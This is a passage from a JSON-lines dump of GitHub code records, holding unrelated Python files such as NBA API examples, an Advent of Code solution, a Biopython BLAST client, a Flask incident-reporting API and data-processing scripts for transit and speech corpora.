user deploying the webserver. Assuming you are using the\n# Ubuntu VM provided by Qiime, the path should look something like below\nL_MATRIX_DATA_PATH = os.path.join(STATIC_ROOT, 'data/')\n\n# If you can host a redis on your machine, just use 127.0.0.1, else\n# use an online one. If you can setup a redis on your home machine and is\n# running a VM of Ubuntu with Qiime with VirtualBox, use 10.0.2.2\nBROKER_URL = \"redis://127.0.0.1//\"\n\n# Set maximum number of uploadable samples in asingle BIOM file\n# Set maximum number of uploadable samples in asingle BIOM file\nBRAYCURTIS_MAX_SAMPLES = 100\nAESAUNIFRAC_MAX_SAMPLES = 100\nGNATUNIFRAC_MAX_SAMPLES = 10\n","repo_name":"syaffers/visibiome","sub_path":"vzb/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22137002119","text":"import logging\nimport pynbaapi\n\n# Set up logging\nlogger = logging.getLogger(\"pynbaapi\")\nlogger.setLevel(logging.DEBUG)\nrootLogger = logging.getLogger()\nrootLogger.setLevel(logging.DEBUG)\nch = logging.StreamHandler()\nformatter = logging.Formatter(\n \"%(asctime)s - %(levelname)8s - %(name)s(%(thread)s) - %(message)s\"\n)\nch.setFormatter(formatter)\nrootLogger.addHandler(ch)\n\n# Initiate the NBA API object with a user-agent\nnba = pynbaapi.nba.NBA(\n f\"{pynbaapi.constants.APP_NAME} Examples/{pynbaapi.__version__.__version__}\"\n)\n\n# Get a list of basic team about all teams\n# List will contain objects with attributes:\n# team_city, team_id, team_name, team_slug, team_tricode\n# As far as I can tell, team_tricode is the same as\n# team_abbreviation in other endpoints\n# NOTE: this method retrieves the full season's schedule and extracts team info\n# so it is a bit slow the first time. The data is cached for subsequent calls.\nall_teams_basic_info = nba.all_teams()\n\n# Get team_id for 76ers from the list of all team basic info\n# Result: 1610612755 (int)\nsixers_id = next(x.team_id for x in all_teams_basic_info if x.team_tricode == \"PHI\")\n\n# Alternately, find the team based on abbreviation/tricode, city, or name\n# and get the id from there\n# Result: 1610612755 (int)\nsixers_id = nba.find_team(\"PHI\")[0].team_id\n\n# Get more details about the team\n# Response will be an object with the following data attributes:\n# available_seasons: list of seasons the team has played - these have an extra\n# character prefixed on them and I'm not sure what it means\n# team_info: wins, losses, division/conf name and rank, etc.\n# team_season_ranks: values per game and league ranks for ast, pts, reb, opp_pts\nsixers_details = nba.team(sixers_id)\n\n# Get history about the team\n# Response will be an object with the following data attributes:\n# awards_championships/conf/div: list of years the team won\n# background: basic info about the team including arena, dleague affiliation,\n# GM, owner, head coach, and year founded\n# history: list of city/names the team has had\n# hof_players, retired numbers, social_sites: self-explanatory lists\nsixers_history = nba.team_history(sixers_id)\n\n# Get the Sixers schedule for the 2021 season,\n# get the details of the game on 10/20/2021,\n# and extract the opponent name\nsixers_schedule = nba.schedule(season=\"2021\", team_id=sixers_id)\nsixers_game_102021 = next(\n x.games[0]\n for x in sixers_schedule.league_schedule.game_dates\n if x.game_date.startswith(\"10/20/2021\")\n)\nsixers_opponent_102021 = (\n sixers_game_102021.away_team.team_name\n if sixers_game_102021.away_team.team_id != sixers_id\n else sixers_game_102021.home_team.team_name\n)\n\n# Get a scoreboard of games from 10/24/2021\n# Response will be an object with a scoreboard attribute\n# containing a list of game objects (scoreboard.scoreboard.games)\n# Each game object contains attributes such as game_id, game_time_utc,\n# game_status, period, away_team & home_team (team objects), and team_leaders\nscoreboard = nba.scoreboard(game_date=\"2021-10-24\")\n\n# Find the Sixers game in the scoreboard,\n# extract the status and the final score\nsixers_game = next(\n x\n for x in scoreboard.scoreboard.games\n if sixers_id in [x.away_team.team_id, x.home_team.team_id]\n)\nsixers_game_status = sixers_game.game_status_text\nsixers_game_final_score = f\"{sixers_game.away_team.team_name} ({sixers_game.away_team.score}) @ ({sixers_game.home_team.score}) {sixers_game.home_team.team_name}\"\n\n# Get the boxscore summary from the Sixers game on 10/24/21\n# and get the attendance\nsixers_game_box = nba.boxscore(sixers_game.game_id)\nsixers_game_attendance = sixers_game_box.box_score_summary.attendance\n\n# Get the play-by-play data for the Sixers game on 10/24/21\n# and get the total count of fouls for each team\nsixers_game_pbp = nba.play_by_play(sixers_game.game_id)\nsixers_game_sixers_fouls = sum(\n 1\n for x in sixers_game_pbp.game.actions\n if x.action_type == \"Foul\" and x.team_tricode == \"PHI\"\n)\nsixers_game_thunder_fouls = sum(\n 1\n for x in sixers_game_pbp.game.actions\n if x.action_type == \"Foul\" and x.team_tricode == \"OKC\"\n)\n","repo_name":"toddrob99/pynbaapi","sub_path":"examples/examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"45388296797","text":"def stup(arr,i,j):\n n=len(arr)\n if(i<0 or i>=n):\n return\n if(j<0 or j>=n):\n return\n if(arr[i][j]==0):\n return\n if(arr[i][j]==1):\n return \n arr[i][j]=1\n stup(arr,i,j-1)\n stup(arr,i,j+1)\n stup(arr,i-1,j)\n stup(arr,i+1,j)\n \n \n(n,b)=map(int,input().split(\" \"))\n(i,j)=map(int,input().split(\" \"))\nl=[]\nfor k in range(0,b):\n t=map(int,input().split(\" \"))\n l.append(list(t))\nAdj=[[-1 for r in range(0,n)] for q in range(0,n)]\nfinal=[[1 for r in range(0,n)] for q in range(0,n)]\nfor t in l:\n (x,y)=t\n Adj[x-1][y-1]=0\n final[x-1][y-1]=0\nB=Adj\nstup(B,i-1,j-1)\nif(B==final):\n print(\"Y\")\nelse:\n print(\"N\")\n\n","repo_name":"bhi5hmaraj/APRG-2020","sub_path":"Assignment 3/flood_fill_solutions/BMC201919/BMC201919.py","file_name":"BMC201919.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"44495475116","text":"from rich.markdown import Markdown\nfrom textual.app import ComposeResult\nfrom textual.containers import Container, VerticalScroll\nfrom textual.screen import ModalScreen\nfrom textual.widgets import Static\n\n\nclass DebugScreen(ModalScreen):\n BINDINGS = [\n (\"escape\", \"app.pop_screen\", \"OK\"),\n ]\n\n def __init__(self, message: str | Markdown) -> None:\n super().__init__()\n self.message = message\n\n def compose(self) -> ComposeResult:\n with Container(id=\"debug_container\"):\n with VerticalScroll(id=\"debug_scroll\"):\n yield Static(\n self.message,\n id=\"debug_static\",\n )\n","repo_name":"sharkusk/tts-mutility","sub_path":"ttsmutility/screens/DebugScreen.py","file_name":"DebugScreen.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"83"} +{"seq_id":"42862451435","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\nimport datetime\r\nimport json\r\nimport itertools\r\n\r\nfrom tqdm import tqdm\r\nfrom multiprocessing import Pool\r\n\r\ncounter = 0\r\n\r\njoint_codes = {\r\n\"EW24\": \"NS1\",\r\n\"CC1\": \"NS24\",\r\n\"NE6\": \"NS24\",\r\n\"EW13\" : \"NS25\",\r\n\"EW14\": \"NS26\",\r\n\"DT15\": \"CC4\",\r\n\"STC\": \"NE16\",\r\n\"PTC\": \"NE17\"\r\n}\r\n\r\ninterchange_codes = {\r\n \"BP1\": \"NS4\",\r\n \"CC15\": \"NS17\",\r\n \"CE2\": \"NS27\",\r\n \"CC9\": \"EW8\",\r\n \"DT14\": \"EW12\",\r\n \"NE3\": \"EW16\",\r\n \"CC22\": \"EW21\",\r\n \"DT35\": \"CG1\",\r\n \"CC29\": \"NE1\",\r\n \"DT19\": \"NE4\",\r\n \"DT12\": \"NE7\",\r\n \"CC13\": \"NE12\",\r\n \"STC\": \"NE16\",\r\n \"PTC\": \"NE17\",\r\n \"DT26\": \"CC10\",\r\n \"DT9\": \"CC19\",\r\n \"DT16\": \"CE1\",\r\n \"TE2\": \"NS9\",\r\n \"TE9\": \"CC17\",\r\n \"TE11\": \"DT10\",\r\n \"TE14\": \"NS22\",\r\n \"TE17\": \"EW16\",\r\n \"TE20\": \"NS27\",\r\n \"TE31\": \"DT37\",\r\n \"FL1\": \"CC32\",\r\n \"JS1\": \"NS4\",\r\n \"JS8\": \"EW27\",\r\n \"JE5\": \"EW24-NS1\"\r\n \r\n }\r\n\r\ndef replace_jointcode(code):\r\n code = code.split('/')[0]\r\n if code in joint_codes.keys():\r\n return joint_codes[code]\r\n if code in interchange_codes.keys():\r\n return interchange_codes[code]\r\n return code\r\n \r\ndef apply_chunked_df(df):\r\n with open('train_routes_nx.json') as json_file:\r\n data = json.load(json_file)\r\n df_fin = pd.DataFrame()\r\n df_temp = pd.DataFrame()\r\n iter = data.items()\r\n for code, orig in iter:\r\n for destcode, dest in data[code].items():\r\n a, b = pairwise(dest)\r\n a.pop()\r\n pairs_len = len(b)\r\n df_temp = pd.DataFrame()\r\n data1 = pd.DataFrame(df.loc[(df[\"ORIGIN_PT_CODE\"] == replace_jointcode(code)) & (df[\"DESTINATION_PT_CODE\"] == replace_jointcode(destcode))])\r\n for data_row in data1.itertuples(index=False):\r\n df_data = pd.DataFrame([data_row])\r\n df_data = df_data.loc[df_data.index.repeat(pairs_len)]\r\n df_data[\"ORIGIN_PT_CODE\"] = a\r\n df_data[\"DESTINATION_PT_CODE\"] = b\r\n df_temp = df_temp.append(df_data, ignore_index=True)\r\n \r\n if len(df_temp.index) > 0:\r\n df_temp = df_temp.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE', 'TIME_PER_HOUR']).sum()\r\n df_fin = df_fin.append(df_temp)\r\n \r\n df_fin = df_fin.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE', 'TIME_PER_HOUR']).sum()\r\n return df_fin\r\n \r\n#http://www.racketracer.com/2016/07/06/pandas-in-parallel/\r\ndef parallelize_dataframe(df):\r\n df_split = np.array_split(df, 14)\r\n pool = Pool(14)\r\n df = pd.concat(pool.map(apply_chunked_df, df_split))\r\n pool.close()\r\n pool.join()\r\n return df\r\n\r\ndef pairwise(iterable):\r\n \"s -> (s0,s1), (s1,s2), (s2, s3), ...\"\r\n a, b = itertools.tee(iterable)\r\n next(b, None)\r\n return list(a), list(b)\r\n \r\n\r\nmonth = input(\"Dataset for (YYYYMM): \")\r\nweekdays = input(\"Number of weekdays: \")\r\nweekdays = int(weekdays)\r\n\r\nspecials = input(\"Number of weekends and holidays: \")\r\nspecials = int(specials)\r\n\r\nif not os.path.exists(os.path.join(os.getcwd(), \"processed_data\", month)):\r\n os.mkdir(os.path.join(os.getcwd(), \"processed_data\", month))\r\n\r\ntotal = specials + weekdays\r\n\r\n#now for orig dest\r\n\r\nin_file = os.path.join(os.getcwd(), \"..\", \"raw_data\", month, \"origin_destination_train_\" + month + \".csv\")\r\n\r\ndf = pd.read_csv(in_file)\r\n\r\n#orig dest\r\ndf['multiplier'] = df['DAY_TYPE']\r\n\r\ndf = df.replace({'ORIGIN_PT_CODE': interchange_codes, 'DESTINATION_PT_CODE': interchange_codes, 'multiplier': {'WEEKENDS/HOLIDAY': specials, 'WEEKDAY': weekdays}})\r\ndf['TOTAL_TRIPS'] = (df['TOTAL_TRIPS'] / df['multiplier']).round(0)\r\ndf = df[df['TOTAL_TRIPS'] !=0]\r\ndf = df[df['ORIGIN_PT_CODE'] != df['DESTINATION_PT_CODE']]\r\ndf1 = df.drop(columns=['multiplier'])\r\n\r\n#congestion analysis\r\n\r\n \r\ntqdm.pandas()\r\n\r\ndf_out = pd.DataFrame()\r\ndf_fin = pd.DataFrame()\r\nprint(df1.size)\r\ndf_out = parallelize_dataframe(df1)\r\n\r\n#df1.progress_apply(unpack_column, axis=1)\r\n\r\n#pack up the stragglers\r\ndf_out = df_out.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE', 'TIME_PER_HOUR']).sum()\r\ndf_fin = df_fin.append(df_out)\r\n\r\ndf_fin = df_fin.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE', 'TIME_PER_HOUR']).sum()\r\n\r\ndf_fin1 = pd.pivot_table(df_fin, index=['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE'], columns=[\"TIME_PER_HOUR\"], aggfunc={'TOTAL_TRIPS': np.sum})\r\n\r\ndf_fin = df_fin.groupby(['DAY_TYPE', 'ORIGIN_PT_CODE', 'DESTINATION_PT_CODE']).sum()\r\n\r\ndf_fin.to_csv(os.path.join(os.getcwd(), \"processed_data\", month, \"cda_nx_opt_train_\" + month + \"_summary_\" + datetime.datetime.now().strftime('%Y%m%d%H%M%S') + \".csv\"))\r\ndf_fin1.to_csv(os.path.join(os.getcwd(), \"processed_data\", month, \"cda_nx_opt_train_\" + month + \"_byhour_\" + datetime.datetime.now().strftime('%Y%m%d%H%M%S') + \".csv\"))","repo_name":"yuuka-miya/ftrl-data","sub_path":"analysis/old_code/reader_timed_mt.py","file_name":"reader_timed_mt.py","file_ext":"py","file_size_in_byte":4767,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"83"} +{"seq_id":"13084412367","text":"from functools import cmp_to_key\n\ndef compare(a, b):\n if type(a) == int and type(b) == int:\n return a - b\n elif type(a) == list and type(b) == list:\n for x, y in zip(a,b):\n res = compare(x, y)\n if res != 0:\n return res\n return len(a) - len(b)\n elif type(a) == int:\n return compare([a], b)\n else:\n return compare(a,[b])\n \n\nlists = list(map(eval, open('inputs/data13.txt').read().strip().split()))\n\ncorrect = 0\n\nfor i in range(1, len(lists), 2):\n l = lists[i-1]\n r = lists[i]\n if compare(l, r) < 1:\n correct += 1 + i // 2 \n\nlists = lists + [[[2]]] + [[[6]]]\n\nlists.sort(key=cmp_to_key(compare))\n\nprint(\"Task 1:\", correct)\nprint(\"Task 2:\", (lists.index([[2]]) + 1) * (lists.index([[6]]) + 1))\n","repo_name":"Lyrete/adventofcode","sub_path":"2022/13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"32182497849","text":"board = [\"\"]*9\r\ndef draw_board(board):\r\n row_1 = \"{}|{}|{}\".format(board[0], board[1] , board[2])\r\n row_2 = \"{}|{}|{}\".format(board[3], board[4] , board[5])\r\n row_3 = \"{}|{}|{}\".format(board[6], board[7] , board[8])\r\n print(row_1+'\\\\n'+row_2+'\\\\n'+row_3)\r\ndef user_move(board , user_type):\r\n user_choice = int(input(\"Choose your space between 1-9\"))-1\r\nif board[user_choice]!=\"\":\r\n print(\"Space is taken . Try Again!\")\r\n user_move(board , user_type)\r\nelse:\r\n board[user_choice] = user_type\r\n available_space.remove(user_choice)\r\ndef comp_move(board , user_type):\r\n computer_choice = random.choice(available_space)\r\n board[computer_choice] = user_type\r\n available_space.remove(computer_choice)\r\ndef check_win(board , x_o):\r\n \r\n if board[0]==x_o and board[1]==x_o and board[2]==x_o or board[3]==x_o and board[4]==x_o and board[5]==x_o or board[6]==x_o and board[7]==x_o and board[8]==x_o or board[0]==x_o and board[3]==x_o and board[6]==x_o or board[1]==x_o and board[4]==x_o and board[7]==x_o or board[2]==x_o and board[5]==x_o and board[8]==x_o or board[0]==x_o and board[4]==x_o and board[8]==x_o or board[2]==x_o and board[4]==x_o and board[6]==x_o:\r\n play = False\r\n print(\"Hooray:{} has been\".format(x_o))\r\n else:\r\n \r\n play = True\r\n return play\r\n \r\n import random\r\n board[\"\"]*9\r\n available_space = [0, 1 , 2 , 3 , 4 , 5 , 6 , 7 , 8]\r\n draw_board(board)\r\n play = True\r\n computer_or_friend = input(\"Would you like to play against the computer or friend ? (computer and friend)\") \r\n while play ==True:\r\n user_move(board , \"x\")\r\n play = check_win(board , \"x\")\r\n if play == False:\r\n continue\r\n draw_board(board)\r\n if computer_or_friend == \"F\":\r\n user_move(board , \"o\")\r\n elif computer_or_friend == \"c\":\r\n comp_move(board , \"o\")\r\n play = check_win(board , \"o\")\r\n draw_board(board)\r\nprint(\"End of the program\")\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"Udaysharma9027/Python-Programming","sub_path":"Tic Tac Toe Game.py","file_name":"Tic Tac Toe Game.py","file_ext":"py","file_size_in_byte":2171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28804979418","text":"from urllib import urlencode as _urlencode\nfrom urllib2 import urlopen as _urlopen, Request as _Request\nfrom io import StringIO\n\n\nNCBI_BLAST_URL = \"https://blast.ncbi.nlm.nih.gov/Blast.cgi\"\n\ndef _as_bytes(s):\n\t\t\"\"\"Turn a (byte) string or a unicode string into a (byte) string.\"\"\"\n\t\treturn str(s)\n\n_as_string = _as_bytes\n\ndef _parse_qblast_ref_page(handle):\n\t\"\"\"Extract a tuple of RID, RTOE from the 'please wait' page (PRIVATE).\n\n\tThe NCBI FAQ pages use TOE for 'Time of Execution', so RTOE is probably\n\t'Request Time of Execution' and RID would be 'Request Identifier'.\n\t\"\"\"\n\ts = _as_string(handle.read())\n\ti = s.find(\"RID =\")\n\tif i == -1:\n\t\trid = None\n\telse:\n\t\tj = s.find(\"\\n\", i)\n\t\trid = s[i + len(\"RID =\"):j].strip()\n\n\ti = s.find(\"RTOE =\")\n\tif i == -1:\n\t\trtoe = None\n\telse:\n\t\tj = s.find(\"\\n\", i)\n\t\trtoe = s[i + len(\"RTOE =\"):j].strip()\n\n\tif not rid and not rtoe:\n\t\t# Can we reliably extract the error message from the HTML page?\n\t\t# e.g. \"Message ID#24 Error: Failed to read the Blast query:\n\t\t#\t\tNucleotide FASTA provided for protein sequence\"\n\t\t# or\t\"Message ID#32 Error: Query contains no data: Query\n\t\t#\t\tcontains no sequence data\"\n\t\t#\n\t\t# This used to occur inside a
entry:\n\t\ti = s.find('
')\n\t\tif i != -1:\n\t\t\tmsg = s[i + len('
'):].strip()\n\t\t\tmsg = msg.split(\"
\", 1)[0].split(\"\\n\", 1)[0].strip()\n\t\t\tif msg:\n\t\t\t\traise ValueError(\"Error message from NCBI: %s\" % msg)\n\t\t# In spring 2010 the markup was like this:\n\t\ti = s.find('

')\n\t\tif i != -1:\n\t\t\tmsg = s[i + len('

'):].strip()\n\t\t\tmsg = msg.split(\"

\", 1)[0].split(\"\\n\", 1)[0].strip()\n\t\t\tif msg:\n\t\t\t\traise ValueError(\"Error message from NCBI: %s\" % msg)\n\t\t# Generic search based on the way the error messages start:\n\t\ti = s.find('Message ID#')\n\t\tif i != -1:\n\t\t\t# Break the message at the first HTML tag\n\t\t\tmsg = s[i:].split(\"<\", 1)[0].split(\"\\n\", 1)[0].strip()\n\t\t\traise ValueError(\"Error message from NCBI: %s\" % msg)\n\t\t# We didn't recognise the error layout :(\n\t\t# print s\n\t\traise ValueError(\"No RID and no RTOE found in the 'please wait' page, \"\n\t\t\t\t\t\t \"there was probably an error in your request but we \"\n\t\t\t\t\t\t \"could not extract a helpful error message.\")\n\telif not rid:\n\t\t# Can this happen?\n\t\traise ValueError(\"No RID found in the 'please wait' page.\"\n\t\t\t\t\t\t \" (although RTOE = %s)\" % repr(rtoe))\n\telif not rtoe:\n\t\t# Can this happen?\n\t\traise ValueError(\"No RTOE found in the 'please wait' page.\"\n\t\t\t\t\t\t \" (although RID = %s)\" % repr(rid))\n\n\ttry:\n\t\treturn rid, int(rtoe)\n\texcept ValueError:\n\t\traise ValueError(\"A non-integer RTOE found in \"\n\t\t\t\t\t\t \"the 'please wait' page, %s\" % repr(rtoe))\n\ndef qblast(program, database, sequence, url_base=NCBI_BLAST_URL,\n\t\t\tauto_format=None, composition_based_statistics=None,\n\t\t\tdb_genetic_code=None, endpoints=None, entrez_query='(none)',\n\t\t\texpect=10.0, filter=None, gapcosts=None, genetic_code=None,\n\t\t\thitlist_size=50, i_thresh=None, layout=None, lcase_mask=None,\n\t\t\tmatrix_name=None, nucl_penalty=None, nucl_reward=None,\n\t\t\tother_advanced=None, perc_ident=None, phi_pattern=None,\n\t\t\tquery_file=None, query_believe_defline=None, query_from=None,\n\t\t\tquery_to=None, searchsp_eff=None, service=None, threshold=None,\n\t\t\tungapped_alignment=None, word_size=None,\n\t\t\talignments=500, alignment_view=None, descriptions=500,\n\t\t\tentrez_links_new_window=None, expect_low=None, expect_high=None,\n\t\t\tformat_entrez_query=None, format_object=None, format_type='XML',\n\t\t\tncbi_gi=None, results_file=None, show_overview=None, megablast=None,\n\t\t\t):\n\t\n\timport time\n\tassert program in ['blastn', 'blastp', 'blastx', 'tblastn', 'tblastx']\n\n\tparameters = [\n\t\t('AUTO_FORMAT', auto_format),\n\t\t('COMPOSITION_BASED_STATISTICS', composition_based_statistics),\n\t\t('DATABASE', database),\n\t\t('DB_GENETIC_CODE', db_genetic_code),\n\t\t('ENDPOINTS', endpoints),\n\t\t('ENTREZ_QUERY', entrez_query),\n\t\t('EXPECT', expect),\n\t\t('FILTER', filter),\n\t\t('GAPCOSTS', gapcosts),\n\t\t('GENETIC_CODE', genetic_code),\n\t\t('HITLIST_SIZE', hitlist_size),\n\t\t('I_THRESH', i_thresh),\n\t\t('LAYOUT', layout),\n\t\t('LCASE_MASK', lcase_mask),\n\t\t('MEGABLAST', megablast),\n\t\t('MATRIX_NAME', matrix_name),\n\t\t('NUCL_PENALTY', nucl_penalty),\n\t\t('NUCL_REWARD', nucl_reward),\n\t\t('OTHER_ADVANCED', other_advanced),\n\t\t('PERC_IDENT', perc_ident),\n\t\t('PHI_PATTERN', phi_pattern),\n\t\t('PROGRAM', program),\n\t\t# ('PSSM',pssm), - It is possible to use PSI-BLAST via this API?\n\t\t('QUERY', sequence),\n\t\t('QUERY_FILE', query_file),\n\t\t('QUERY_BELIEVE_DEFLINE', query_believe_defline),\n\t\t('QUERY_FROM', query_from),\n\t\t('QUERY_TO', query_to),\n\t\t# ('RESULTS_FILE',...), - Can we use this parameter?\n\t\t('SEARCHSP_EFF', searchsp_eff),\n\t\t('SERVICE', service),\n\t\t('THRESHOLD', threshold),\n\t\t('UNGAPPED_ALIGNMENT', ungapped_alignment),\n\t\t('WORD_SIZE', word_size),\n\t\t('CMD', 'Put'),\n\t\t]\n\t\t\n\tquery = [x for x in parameters if x[1] is not None]\n\tmessage = _as_bytes(_urlencode(query))\n\n\trequest = _Request(url_base,message,{\"User-Agent\": \"BiopythonClient\"})\n\thandle = _urlopen(request)\n\n\trid, rtoe = _parse_qblast_ref_page(handle)\n\tparameters = [\n\t\t('ALIGNMENTS', alignments),\n\t\t('ALIGNMENT_VIEW', alignment_view),\n\t\t('DESCRIPTIONS', descriptions),\n\t\t('ENTREZ_LINKS_NEW_WINDOW', entrez_links_new_window),\n\t\t('EXPECT_LOW', expect_low),\n\t\t('EXPECT_HIGH', expect_high),\n\t\t('FORMAT_ENTREZ_QUERY', format_entrez_query),\n\t\t('FORMAT_OBJECT', format_object),\n\t\t('FORMAT_TYPE', format_type),\n\t\t('NCBI_GI', ncbi_gi),\n\t\t('RID', rid),\n\t\t('RESULTS_FILE', results_file),\n\t\t('SERVICE', service),\n\t\t('SHOW_OVERVIEW', show_overview),\n\t\t('CMD', 'Get'),]\n\tquery = [x for x in parameters if x[1] is not None]\n\tmessage = _as_bytes(_urlencode(query))\n\n\t# Poll NCBI until the results are ready. Use a backoff delay from 2 - 120 second wait\n\tdelay = 2.0\n\tprevious = time.time()\n\twhile True:\n\t\tcurrent = time.time()\n\t\twait = previous + delay - current\n\t\tif wait > 0:\n\t\t\ttime.sleep(wait)\n\t\t\tprevious = current + wait\n\t\telse:\n\t\t\tprevious = current\n\t\tif delay + .5 * delay <= 120:\n\t\t\tdelay += .5 * delay\n\t\telse:\n\t\t\tdelay = 120\n\n\t\trequest = _Request(url_base,message,{\"User-Agent\": \"BiopythonClient\"})\n\t\thandle = _urlopen(request)\n\t\tresults = _as_string(handle.read())\n\n\t\t# Can see an \"\\n\\n\" page while results are in progress,\n\t\t# if so just wait a bit longer...\n\t\tif results == \"\\n\\n\":\n\t\t\tcontinue\n\t\t# XML results don't have the Status tag when finished\n\t\tif \"Status=\" not in results:\n\t\t\tbreak\n\t\ti = results.index(\"Status=\")\n\t\tj = results.index(\"\\n\", i)\n\t\tstatus = results[i + len(\"Status=\"):j].strip()\n\t\tif status.upper() == \"READY\":\n\t\t\tbreak\n\n\treturn (results)","repo_name":"Aniket-Bhagat/Computing_tools_10","sub_path":"Biopython_(Blastx)/blastx_biopython.py","file_name":"blastx_biopython.py","file_ext":"py","file_size_in_byte":6555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18970350182","text":"from flask import jsonify,request,json, abort\nfrom . methods import IncidentList\nfrom . models import Models \nfrom datetime import datetime\n\ninciden = IncidentList()\n\ndef report_an_incident():\n\tdata = request.get_json()\n\tif not data or not data.get('createdBy') or not data.get('location') \\\n\tor not data.get('status') or not data.get('incident_type') or not data.get('images') \\\n\tor not data.get('videos') or not data.get('comment'):\n\t\tabort(400)\n\t\t#return jsonify({\"message\" : \"all fields are empty\"}),40\n\n\tcreatedBy,location,status,incident_type,images,videos,comment = \\\n\tdata.get('createdBy'),data.get('location'),data.get('status'), \\\n\tdata.get('incident_type'),data.get('images'),data.get('videos'), \\\n\tdata.get('comment')\n\n\tincident_id = inciden.generate_incident_id()\n\n\tcreatedOn = date_today = datetime.now().strftime('%d%m%y %H%M')\n\n\tnew_incident = Models(incident_id, createdOn, createdBy, location, status, incident_type, images, videos, comment)\n\tif location == \"\" or createdBy == '':\n\t\treturn jsonify({\"message\": \"location and createdBy can not be empty\"}),400\n\n\tinciden.add_an_incident(new_incident)\n\n\treturn jsonify({\"incident\" : inciden.incident_list[-1]}),201\n\ndef fetch_all_redflags():\n\treturn jsonify({\"red-flags\" : inciden.get_all_incidents()}),200\n\ndef fetch_specific_redflag(redflag_id):\n\tif not inciden.get_specific_incident(redflag_id):\n\t\treturn jsonify({\"message\" : \"NO redflag of that id found\"}),401\n\n\treturn jsonify({\"incident\" : inciden.get_specific_incident(redflag_id)}),200\n\ndef edit_location_of_redflag(redflag_id):\n\tredflag = inciden.get_specific_incident(redflag_id)\n\tif redflag:\n\t\tlocation = request.get_json()['location']\n\t\tnew_location = location\n\t\tredflag[0]['location'] = new_location\n\t\treturn jsonify({\"Incident\" : redflag}),200\n\n\treturn jsonify({\"Error\" : \"No incident that id\"}),401\n\ndef edit_comment_of_redflag(redflag_id):\n\tredflag = inciden.get_specific_incident(redflag_id)\n\tif redflag:\n\t\tcomment = request.get_json()['comment']\n\t\tnew_comment = comment\n\t\tredflag[0]['comment'] = new_comment\n\t\treturn jsonify({\"Incident\" : redflag}),200\n\n\treturn jsonify({\"Error\" : \"No incident that id \"}),401\n\n\ndef delete_an_incident(id):\n\tfor redflag in inciden.incident_list:\n\t\tif redflag['incident_id'] == id:\n\t\t\tinciden.incident_list.remove(redflag),200\n\t\t\treturn jsonify({\"message\": \"incident is now now removed\"}),200\n\treturn jsonify({\"Error\": \"The incident your looking for is not found\"}),401","repo_name":"MUGABA/IREpoterv1","sub_path":"api/Incidents/contrals.py","file_name":"contrals.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70585606993","text":"## a code to make TIMIT, L2-arctic, and Speechocean762 utterance list into csv files\nimport json\nimport os\nimport re\n\nfrom datasets import load_dataset\n\n# make TIMIT utterance list into csv files\nPATH = \"/PATH_TO_DATA/timit/TIMIT/\"\ntimit_train = open(\"./timit_train.csv\", \"w\")\ntimit_test = open(\"./timit_test.csv\", \"w\")\n\nfor r, d, f in os.walk(PATH):\n d.sort()\n f.sort()\n for file in f:\n if \".PHN\" in file:\n name = file.split(\".PHN\")[0]\n audio = name + \".WAV\"\n text = name + \".TXT\"\n\n if \"TEST\" in r:\n print(os.path.join(r, audio), os.path.join(r, file), os.path.join(r, text), sep=\",\", file=timit_test)\n else:\n print(os.path.join(r, audio), os.path.join(r, file), os.path.join(r, text), sep=\",\", file=timit_train)\n\ntimit_train.close()\ntimit_test.close()\n\n\n# make L2-ARCTIC utterance list into csv files\nPATH = \"/PATH_TO_DATA/l2-arctic/\"\ntestset = [\"NJS\", \"TLV\", \"TNI\", \"TXHC\", \"YKWK\", \"ZHAA\"]\ndevset = [\"MBMPS\", \"THV\", \"SVBI\", \"NCC\", \"YDCK\", \"YBAA\"]\ntrainset = [\"BWC\", \"PNV\", \"EBVS\", \"HQTV\", \"ERMS\", \"HKK\", \"LXC\", \"ASI\", \"SKA\", \"RRBI\", \"ABA\", \"HJK\"]\narctic_train = open(\"./l2arctic_train.txt\", \"w\")\narctic_test = open(\"./l2arctic_test.txt\", \"w\")\nfor t in trainset + devset:\n for r, d, f in os.walk(PATH + t):\n f.sort()\n for file in f:\n if \"annotation\" in r:\n path = r.split(\"annotation\")[0]\n name = file.split(\".TextGrid\")[0]\n arctic_train.write(\n path + \"wav/\" + name + \".wav\" + \"\\t\" + path + \"annotation/\" + file + \"\\t\" + path + \"transcript/\" + name + \".txt\" + \"\\n\"\n )\n\nfor t in testset:\n for r, d, f in os.walk(PATH + t):\n f.sort()\n for file in f:\n if \"annotation\" in r:\n path = r.split(\"annotation\")[0]\n name = file.split(\".TextGrid\")[0]\n arctic_test.write(\n path + \"wav/\" + name + \".wav\" + \"\\t\" + path + \"annotation/\" + file + \"\\t\" + path + \"transcript/\" + name + \".txt\" + \"\\n\"\n )\n\narctic_train.close()\narctic_test.close()\n\n\n# make SPEECHOCEAN762 utterance list into 